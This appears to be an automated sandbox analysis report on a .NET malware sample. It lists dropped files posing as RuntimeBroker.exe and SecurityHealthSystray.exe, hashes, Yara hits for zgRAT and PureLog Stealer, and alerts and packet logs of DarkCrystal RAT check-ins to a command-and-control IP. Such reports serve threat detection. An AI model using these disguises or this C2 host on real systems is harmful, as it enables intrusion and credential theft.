                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\RuntimeBroker.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\RuntimeBroker.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\RuntimeBroker.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H.......D...l............................................................0..........(.... ........8........E........=...........8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....).......9...........b.......8$...8.... ....~....{h...:....& ....8.......... ....8....~....9.... ....~....{....9....& ....8}.......~....(f...~....(j... ....<.... ....~....{....9G...& ....8<...r...ps....z*~....(^... ...

                                                    C:\Users\user\RuntimeBroker.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):1224
                                                    Entropy (8bit):4.435108676655666
                                                    Encrypted:false
                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                    Malicious:false
                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                    C:\Windows\System32\SecurityHealthSystray.exe

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4608
                                                    Entropy (8bit):3.9498828394823713
                                                    Encrypted:false
                                                    SSDEEP:48:6tJvPtPuM7Jt8Bs3FJsdcV4MKe273df6vqBHiOulajfqXSfbNtm:4PFPc+Vx9MIvkMcjRzNt
                                                    MD5:3D3B629782063180677366E59F36AF73
                                                    SHA1:6D23219C11BA123BE3E9CCF0BAB95CCF3A54D51D
                                                    SHA-256:C8FF27B511D51EC36F298066336C9D13E161544A43FF9A178EFFAA00E6CEE4BB
                                                    SHA-512:58F97A47964D43F4EA6DFEACFB3BA4FAFC45B8F7F8BFF418C8318512656384E0C5679EEBB5631AF2B8801567FC072ECD4004B6F8500C780839BA671111961E71
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................X'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..0.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                    \Device\Null

                                                    Download File
                                                    Process:C:\Windows\System32\w32tm.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):151
                                                    Entropy (8bit):4.8566374747781
                                                    Encrypted:false
                                                    SSDEEP:3:VLV993J+miJWEoJ8FXiz3c9HXKvodUvj:Vx993DEU4X1A
                                                    MD5:896558DB3E3C35EF4B4F000840E8D787
                                                    SHA1:2798BFCD8087F4685024F74FC6C1B1DB6EBFEA6C
                                                    SHA-256:D8ECE3F1618D42766FDEDE9BDCB5D7777CAC5295B7624430760D6A9EF9F2CDF8
                                                    SHA-512:D016530A2F3E51333675ACA6DB7DF9D1E84E76A22EE82E72CFF92391B99F7E228226C20DC8E0DFC5734A7A4602FF2175BBACE2001A024BB979F7C1C21309961B
                                                    Malicious:false
                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 29/08/2024 18:39:27..18:39:27, error: 0x80072746.18:39:32, error: 0x80072746.

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.551297019501714
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:4ra1Fo2Zql.exe
                                                    File size:1'959'424 bytes
                                                    MD5:1b7d99034e439d9f034c9969f88f7b74
                                                    SHA1:8e40bdcdf5092e0afea38110d5f7d4db60c45548
                                                    SHA256:916768dc2a2389d20b0216b9fa62c953860eaaee368f529b820ac009f11018b1
                                                    SHA512:d73461d3311cced4d99042a0130bc603e75ab97f8df413aeb62b4e003691272d15a0293b6c356e72787232faebbbcb1c1a6487d68ff6da48f65228f1938059fa
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    TLSH:E095AE1A99919E3BC2B457314467043E5394D3363EAAEB1B390F20E668437B5CA731FB
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@................................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x5dfc8e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66654F11 [Sun Jun 9 06:43:29 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1dfc400x4b.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e00000x320.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e20000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x1ddc940x1dde0046e917c95129b380d75435a258b660adFalse0.7833655873986398data7.554685403500024IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x1e00000x3200x400d05b66fd093f5688f9c78aee72f6d256False0.349609375data2.6430868172484443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .reloc0x1e20000xc0x2000e49983be2bceee4c3b8545a46bc18e9False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0x1e00580x2c8data0.46207865168539325

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                    2024-08-29T23:03:52.477023+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14972280192.168.2.580.211.144.156
                                                    2024-08-29T23:02:53.836158+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971580192.168.2.580.211.144.156
                                                    2024-08-29T23:02:12.255649+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14970480192.168.2.580.211.144.156
                                                    2024-08-29T23:03:01.039318+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971780192.168.2.580.211.144.156
                                                    2024-08-29T23:03:44.227003+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14972080192.168.2.580.211.144.156
                                                    2024-08-29T23:03:47.305110+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14972180192.168.2.580.211.144.156
                                                    2024-08-29T23:03:10.336992+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971880192.168.2.580.211.144.156
                                                    2024-08-29T23:02:57.539412+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971680192.168.2.580.211.144.156
                                                    2024-08-29T23:02:45.070506+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971380192.168.2.580.211.144.156
                                                    2024-08-29T23:02:37.961096+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971280192.168.2.580.211.144.156
                                                    2024-08-29T23:03:35.336473+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971980192.168.2.580.211.144.156

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Aug 29, 2024 23:02:11.449007988 CEST4970480192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:11.453886986 CEST804970480.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:11.453973055 CEST4970480192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:11.469942093 CEST4970480192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:11.474677086 CEST804970480.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:11.821681976 CEST4970480192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:11.826834917 CEST804970480.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:12.252181053 CEST804970480.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:12.255582094 CEST804970480.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:12.255649090 CEST4970480192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:12.623421907 CEST4970480192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:36.997138977 CEST4971280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:37.154372931 CEST804971280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:37.154526949 CEST4971280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:37.154726028 CEST4971280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:37.160511971 CEST804971280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:37.508162022 CEST4971280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:37.513346910 CEST804971280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:37.840049028 CEST804971280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:37.961096048 CEST4971280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:37.971899986 CEST804971280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:38.054848909 CEST4971280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:38.068216085 CEST4971280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:44.315716028 CEST4971380192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:44.320831060 CEST804971380.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:44.321536064 CEST4971380192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:44.321713924 CEST4971380192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:44.326441050 CEST804971380.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:44.680301905 CEST4971380192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:44.685257912 CEST804971380.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:45.017760992 CEST804971380.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:45.070506096 CEST4971380192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:45.147178888 CEST804971380.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:45.195499897 CEST4971380192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:46.064229012 CEST4971380192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:53.116010904 CEST4971580192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:53.120860100 CEST804971580.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:53.120954990 CEST4971580192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:53.121233940 CEST4971580192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:53.126024008 CEST804971580.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:53.476984024 CEST4971580192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:53.481935978 CEST804971580.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:53.795125961 CEST804971580.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:53.836158037 CEST4971580192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:53.923660994 CEST804971580.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:53.976933002 CEST4971580192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:54.001111984 CEST4971580192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:56.752203941 CEST4971680192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:56.757462025 CEST804971680.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:56.757565022 CEST4971680192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:56.757767916 CEST4971680192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:56.764787912 CEST804971680.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:57.102014065 CEST4971680192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:57.107125044 CEST804971680.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:57.493792057 CEST804971680.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:57.539412022 CEST4971680192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:57.681051970 CEST804971680.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:02:57.726793051 CEST4971680192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:02:58.576014042 CEST4971680192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:00.326076031 CEST4971780192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:00.331029892 CEST804971780.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:00.331131935 CEST4971780192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:00.331306934 CEST4971780192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:00.336103916 CEST804971780.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:00.680107117 CEST4971780192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:00.685019970 CEST804971780.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:00.990461111 CEST804971780.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:01.039318085 CEST4971780192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:01.121143103 CEST804971780.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:01.179948092 CEST4971780192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:01.771677017 CEST4971780192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:09.059708118 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:09.064568043 CEST804971880.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:09.064634085 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:09.064832926 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:09.069762945 CEST804971880.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:09.414546967 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:09.726845980 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:10.121911049 CEST804971880.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:10.122101068 CEST804971880.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:10.122167110 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:10.333895922 CEST804971880.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:10.333905935 CEST804971880.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:10.334460974 CEST804971880.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:10.336992025 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:10.399142027 CEST804971880.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:10.445601940 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:11.065351963 CEST4971880192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:34.626312971 CEST4971980192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:34.631346941 CEST804971980.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:34.631448030 CEST4971980192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:34.631613016 CEST4971980192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:34.636631012 CEST804971980.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:34.977133036 CEST4971980192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:34.982059956 CEST804971980.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:35.295924902 CEST804971980.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:35.336472988 CEST4971980192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:35.425847054 CEST804971980.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:35.477016926 CEST4971980192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:36.072165966 CEST4971980192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:43.511095047 CEST4972080192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:43.515985012 CEST804972080.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:43.516083002 CEST4972080192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:43.516273975 CEST4972080192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:43.521039963 CEST804972080.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:43.867964029 CEST4972080192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:43.872901917 CEST804972080.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:44.184360027 CEST804972080.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:44.227003098 CEST4972080192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:44.328583956 CEST804972080.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:44.383232117 CEST4972080192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:44.452552080 CEST4972080192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:46.565447092 CEST4972180192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:46.570379972 CEST804972180.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:46.571803093 CEST4972180192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:46.571973085 CEST4972180192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:46.576906919 CEST804972180.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:46.930284977 CEST4972180192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:46.936121941 CEST804972180.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:47.254633904 CEST804972180.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:47.305109978 CEST4972180192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:47.389883995 CEST804972180.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:47.430121899 CEST4972180192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:47.467246056 CEST4972180192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:51.724674940 CEST4972280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:51.732319117 CEST804972280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:51.732389927 CEST4972280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:51.732836008 CEST4972280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:51.740451097 CEST804972280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:52.086627007 CEST4972280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:52.091439009 CEST804972280.211.144.156192.168.2.5
